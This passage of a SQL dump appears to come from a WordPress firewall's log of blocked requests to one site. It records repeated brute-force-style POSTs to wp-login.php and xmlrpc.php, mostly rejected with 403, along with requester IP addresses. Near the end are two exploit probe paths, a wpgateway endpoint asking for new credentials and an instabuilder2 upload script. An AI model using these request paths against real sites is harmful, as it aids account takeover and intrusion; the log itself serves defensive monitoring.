(Java\\/1.8.0_161)\"}','uRDrcHnk1sj59pW0eitwybvA',0,1666107870.3526,498,'','POST',403,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','Lsew42SiQVDb3ugWUltXf8GC',0,1666107869.1690,592,'','POST',403,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','swnhXySAGBfRV78c52aYEr04',0,1666107867.9029,493,'','POST',403,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','qiO3YEvL7FaMxpBmIrZKkhA2',0,1666107866.8098,484,'','POST',403,0,515,0,1,'',0),('14.116.220.93',242539613,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','jLXZNIp9F5BgSR68iDadrTky',0,1666107865.7103,499,'','POST',403,0,515,0,1,'',0),('167.172.79.125',2813087613,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wic0qyG6HXjaEJoxTCl1D7UZ',0,1666106700.9414,18781,'','POST',403,0,515,0,1,'',0),('178.128.54.239',2994747119,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bqGryeEvH27Vh9kP1DKzjYO5',0,1666105782.9450,20410,'','POST',403,0,515,0,1,'',0),('196.44.176.39',3291263015,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JiXzOD3yGBdlSC6I5nxNHswp',0,1666106260.5767,18794,'','POST',403,0,515,0,1,'',0),('161.35.105.75',2703452491,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oMvOyqbs0eXihT8NPt6LJYul',0,1666111920.7669,1538,'','POST',403,0,515,0,1,'',0),('31.187.74.213',532368085,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eTjdCKEU6sFNqWQVPmpGtgnY',0,1666111338.5739,2808,'','POST',403,0,515,0,1,'',0),('50.87.224.231',844620007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WSwAzpUoH5B2KkIMLhr0NsDQ',0,1666111659.5473,18301,'','POST',403,0,515,0,1,'',0),('162.241.216.173',2733758637,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UKG5BicWr0nwIk4PMoCDRuSL',0,1666109812.8583,18583,'','POST',403,0,515,0,1,'',0),('124.158.12.83',2090732627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bxRiUqElrStzfAv60oKjcpdI',0,1666109483.7573,20136,'','POST',403,0,515,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','PXMk6Ra95oDV4O1BiTjy7NCI',0,1666109134.3693,19548,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PVbQUhjtDOf5ZFk16yxgnlCR',0,1666113112.2475,18774,'','POST',403,0,515,0,1,'',0),('212.30.36.73',3558745161,'','https://cteisys.com//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/\\/wp-login.php\"}','LeFyIdl5SnuMN38gfqwbZaxi',0,1666112896.0207,481,'','POST',403,0,600,0,1,'',0),('212.30.36.73',3558745161,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','B8mhVisyDMtI49TeSN1KOC2q',0,1666112893.9741,568,'','POST',403,0,515,0,1,'',0),('72.167.225.151',1218961815,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','098HuW3oeZFKycrEPfqwzg42',0,1666112809.2373,18444,'','POST',403,0,515,0,1,'',0),('104.131.68.19',1753433107,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','Lm9qwBtRHuhOcyid7Q68TlJF',0,1666143809.6338,18100,'','POST',403,0,600,0,1,'',0),('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','lmxWv4i5shepzoBLag7qVYXj',0,1666141579.5773,9476,'','POST',403,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','2SKOU4VvN8WqbD5XwCPR19ar',0,1666141519.0687,390,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','YZWPK7kIhq1S3RzHLjQUb0Af',0,1666141516.5815,337,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','xgBevN9mQOypITobljCYSPGa',0,1666141517.8650,392,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','0u4sjv5HgL2UaDxePWyQ7rkI',0,1666141515.4390,320,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','Xzk8fMpgs6QJAeVG9bP4onDi',0,1666141513.2168,307,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','1oKcHvmyY48RqCuX6hVSfW0E',0,1666141514.3245,311,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','1I3bHDWe8pYUAanjEgf97Qcx',0,1666141511.9913,364,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','VZFTsaixcodR9JOU18PAgeIz',0,1666141509.4067,353,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','VCKgTiv0WpleIGr3HQMB6Zb4',0,1666141510.6676,376,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','3kbTglhJ2rXfYjy76FoeRQtd',0,1666141508.1224,386,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','kqrV0CcPJ4AEMvDTX2O7I8K1',0,1666141506.9705,358,'','POST',403,0,700,0,1,'',0),('37.120.142.157',628657821,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','AYg63VnzMoayUC8jd5vmK40J',0,1666128237.8190,1520,'','POST',403,0,515,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','ENhRUtQMYg198SPAv6fFdsLu',0,1666141505.7729,346,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','BQe4qiFCyLX2dSuJ8UIKzAT3',0,1666141502.6344,360,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','3wvnjNquST54aGfp6sQYc2IZ',0,1666141504.2812,611,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','zqpCK54BscoIdG23mgTxZftX',0,1666141501.3932,302,'','POST',403,0,700,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','YCeKt1uQja43kdqnyzRpgTsI',0,1666133000.8000,519,'','POST',403,0,600,0,1,'',0),('85.191.40.94',1438591070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','1OelFvfTx6MZ79KktrUzjo4p',0,1666132737.6625,1414,'','POST',403,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','34nPkmyUBaS0FC6h9i5GLoTr',0,1666141500.0373,302,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','j0GAoaQn9rJ18TlRd2bCc7uB',0,1666141497.7928,306,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','yiSbr6mLTR0JYWzEFvf57K1u',0,1666141498.9381,299,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','1QL7u3eY6BV4lM0XtS5PjRFE',0,1666141496.6209,348,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','sNdD8PrzEiytw2YBkxb4mX0S',0,1666141495.4850,326,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','SXx7YLlJym5jFWHqevbUgdRG',0,1666141494.3013,371,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','xJT4lhfIb6SQ8j2gRn9KHD5N',0,1666141493.1618,305,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','fVbhFE2uQmAqxWGvscgHrjBO',0,1666141492.0316,310,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','yEFalD26XgqCUsf5MznA7OZV',0,1666141490.9212,312,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','083XM9aOgjl5NL2ZStDkzmGw',0,1666141489.6961,436,'','POST',403,0,700,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','seSOyvUrw8PEXlkpGiRHKJBD',0,1666137146.0259,17353,'','POST',403,0,600,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','JPD4bLMhSyzQg5E87ktVXRNi',0,1666134940.3452,17143,'','POST',403,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','GRzWdMtOAb1p9xIQcZlgmhFX',0,1666141488.5168,309,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','uK0vdGfr4Mh12BkJRiqmVPOC',0,1666141487.4273,313,'','POST',403,0,700,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','Az4I8hYN0ZKbSJCVqdo2Wxe5',0,1666141485.8825,452,'','POST',404,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','E3FCAizMv5tN7914paKGwJLe',0,1666141482.7737,489,'','POST',404,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','SkdF1LAZRnaCqQmrE5DGwch6',0,1666141484.3431,435,'','POST',404,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','8uD3cvfg1ZLFem7BIMVG4XJb',0,1666141481.0358,433,'','POST',404,0,600,0,1,'',0),('185.2.5.31',3103917343,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','WvMU1KECh7pJqtg8n3sAQYZ0',0,1666139342.6153,17656,'','POST',403,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','MYlgWX3yN7GArZBpJnu2PHvc',0,1666141479.4781,445,'','POST',404,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','TfuPaZNWmU4RA7Jr0GetMi3H',0,1666141477.8805,447,'','POST',404,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','qg9Ntz5m17Ew0C2jA6OHQxIv',0,1666141476.3322,425,'','POST',404,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','QoHUMKvLlshkjCcOGidVW2fa',0,1666141474.7571,539,'','POST',404,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','eLIWM1GoNHhBwpyJs6YU39rD',0,1666141473.1495,515,'','POST',404,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','vgBhEGFxbLd4sPIezUZlk6q1',0,1666141471.3075,453,'','POST',404,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','VBmSv2PWYoDNMFgTHsujw6KI',0,1666141469.8438,502,'','POST',403,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','daFbQgxYt4VrN2Jjy6mLf9pD',0,1666141468.3646,589,'','POST',403,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','1Hqu74XyNJVUGASP63hMCWi5',0,1666141466.9297,490,'','POST',403,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','Lc4npTDSHue6XRdAfEw8oCgZ',0,1666141464.0119,581,'','POST',403,0,600,0,1,'',0),('159.65.4.107',2671838315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/31.0.1650.16 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\"}','PftVT28LzSh6m3U9WvrYpi5Z',0,1666141465.5430,540,'','POST',403,0,600,0,1,'',0),('110.40.244.196',1848177860,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','RL90B7otPHZXMkuIagfly3re',0,1666155081.1267,17765,'','POST',403,0,600,0,1,'',0),('185.2.5.31',3103917343,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','DZQedTKuwMROgyxkiLWfbzXo',0,1666152851.8923,19679,'','POST',403,0,600,0,1,'',0),('192.71.144.12',3225915404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','Gz3RPAs5JkpTjy8KZNmtcgqE',0,1666159505.6675,20849,'','POST',403,0,600,0,1,'',0),('14.225.255.250',249692154,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','ULGzasD7lNJYSbyXV6FudOfK',0,1666157302.8904,17607,'','POST',403,0,600,0,1,'',0),('148.72.210.140',2487800460,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Sg83DE7lopV9xGzQjJLAWyBU',0,1666162918.8148,19803,'','POST',403,0,515,0,1,'',0),('46.105.29.21',778640661,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','6VYavyiDH8BzxQTRrgNftFWC',0,1666161736.0763,17567,'','POST',403,0,600,0,1,'',0),('194.233.82.147',3270070931,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wkLlO5KzCHZJNaTe6QXWuM3v',0,1666166014.9718,19725,'','POST',403,0,515,0,1,'',0),('45.55.44.23',758590487,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','rP06i15hyAGs4JvnHjCUMYRb',0,1666166244.6774,1248,'','POST',403,0,600,0,1,'',0),('13.233.178.41',233419305,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Taq8Ig6ly0J5HSWYE4VjndXp',0,1666164723.3071,18357,'','POST',403,0,515,0,1,'',0),('159.65.200.228',2671888612,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','8eibSgP5KGckUhwuo7W3Iln9',0,1666163980.9521,17405,'','POST',403,0,600,0,1,'',0),('80.251.219.111',1358682991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Q6TLXS3VFZp9iR5rwI2ekNzO',0,1666163533.9632,18519,'','POST',403,0,515,0,1,'',0),('20.19.208.117',336842869,'','https://cteisys.com//wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','kaZyfr0V5mWpq48AXLPlc3IY',0,1666162964.5069,387,'','POST',403,0,700,0,1,'',0),('20.19.208.117',336842869,'','https://cteisys.com//wp-content/plugins/instabuilder2/cache/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','02sMI84HYA5kfVGXh736NEog',0,1666162959.2731,553,'','GET',403,0,700,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 